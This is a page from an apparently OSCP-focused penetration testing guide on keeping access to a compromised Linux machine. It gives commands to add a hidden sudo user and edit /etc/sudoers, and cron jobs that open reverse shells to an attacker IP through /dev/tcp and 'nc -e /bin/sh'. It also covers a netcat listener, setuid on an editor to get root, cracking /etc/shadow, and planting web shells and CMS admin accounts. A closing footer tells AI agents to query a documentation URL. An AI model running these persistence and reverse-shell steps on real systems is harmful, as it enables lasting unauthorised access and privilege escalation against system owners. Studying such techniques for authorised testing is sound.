# Persistence - Rootkit - Backdoor

So if you manage to compromise a system you need to make sure that you do not lose the shell. If you have used an exploit that messes with the machine the user might want to reboot, and if the user reboots you will lose your shell.

Or, maybe the way to compromise the machine is really complicated or noisy and you don't want to go through the hassle of doing it all again. So instead you just create a backdoor that you can enter fast and easy.

### Create a new user <a href="#create-a-new-user" id="create-a-new-user"></a>

The most obvious, but not so subtle way is to just create a new user (if you are root, or someone with that privilege) .

```
adduser pelle
adduser pelle sudo
```

Now if the machine has `ssh` you will be able to ssh into the machine.

On some machines, older Linux I think, you have to do

```
useradd pelle
passwd pelle
echo "pelle    ALL=(ALL) ALL" >> /etc/sudoers
```

### Crack the password of existing user <a href="#crack-the-password-of-existing-user" id="crack-the-password-of-existing-user"></a>

Get the `/etc/shadow` file and crack the passwords. This is of course only persistent until the user decides to change his/her password. So not so good.

### SSH key <a href="#ssh-key" id="ssh-key"></a>

Add key to existing ssh-account.

### Cronjob NC <a href="#cronjob-nc" id="cronjob-nc"></a>

Create cronjob that connects to your machine every 10 minutes. Here is an example using a bash-reverse-shell. You also need to set up a netcat listener.

Here is how you check if cronjob is active

```
service crond status
pgrep cron
```

If it is not started you can start it like this

```
service crond status
/etc/init.d/cron start
```

```
crontab -e
*/10 * * * * 0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196
```

```
/10 * * * * nc -e /bin/sh 192.168.1.21 5556
```

Listener

```
nc -lvp 5556
```

Sometimes you have to set the user

```
crontab -e
*/10 * * * * pelle /path/to/binary
```

More here: <http://kaoticcreations.blogspot.cl/2012/07/backdooring-unix-system-via-cron.html>

### Metasploit persistence module <a href="#metasploit-persistence-module" id="metasploit-persistence-module"></a>

Create a binary with malicious content inside. Run that, get meterpreter shell, run metasploit persistence.

<https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/>

If you have a meterpreter shell you can easily just run `persistence`.

### Backdoor in webserver <a href="#backdoor-in-webserver" id="backdoor-in-webserver"></a>

You can put a cmd or shell-backdoor in a webserver.

Put backdoor on webserver, either in separate file or in hidden in another file

### Admin account to CMS <a href="#admin-account-to-cms" id="admin-account-to-cms"></a>

Add admin account to CMS.

### Mysql-backdoor <a href="#mysql-backdoor" id="mysql-backdoor"></a>

Mysql backdoor

### Hide backdoor in bootblock <a href="#hide-backdoor-in-bootblock" id="hide-backdoor-in-bootblock"></a>

### Nmap <a href="#nmap" id="nmap"></a>

If the machine has nmap installed:

<https://gist.github.com/dergachev/7916152>

### Setuid on text-editor <a href="#setuid-on-text-editor" id="setuid-on-text-editor"></a>

You can setuid on an editor. So if you can easily enter as a www-data, you can easily escalate to root through the editor.

With `vi` it is extremely easy. You just run `:shell`, and it gives you a shell.

```
# Make root the owner of the file
chown root myBinary

# set the sticky bit/suid
chmod u+s myBinary
```

### References <a href="#references" id="references"></a>

Read this <https://gist.github.com/dergachev/7916152>

This is a creat introduction <http://www.dankalia.com/tutor/01005/0100501002.htm>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cybermuhdupa.gitbook.io/total-oscp-guide/vulnerability-analysis/post-exploitation/persistence-rootkit-backdoor.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.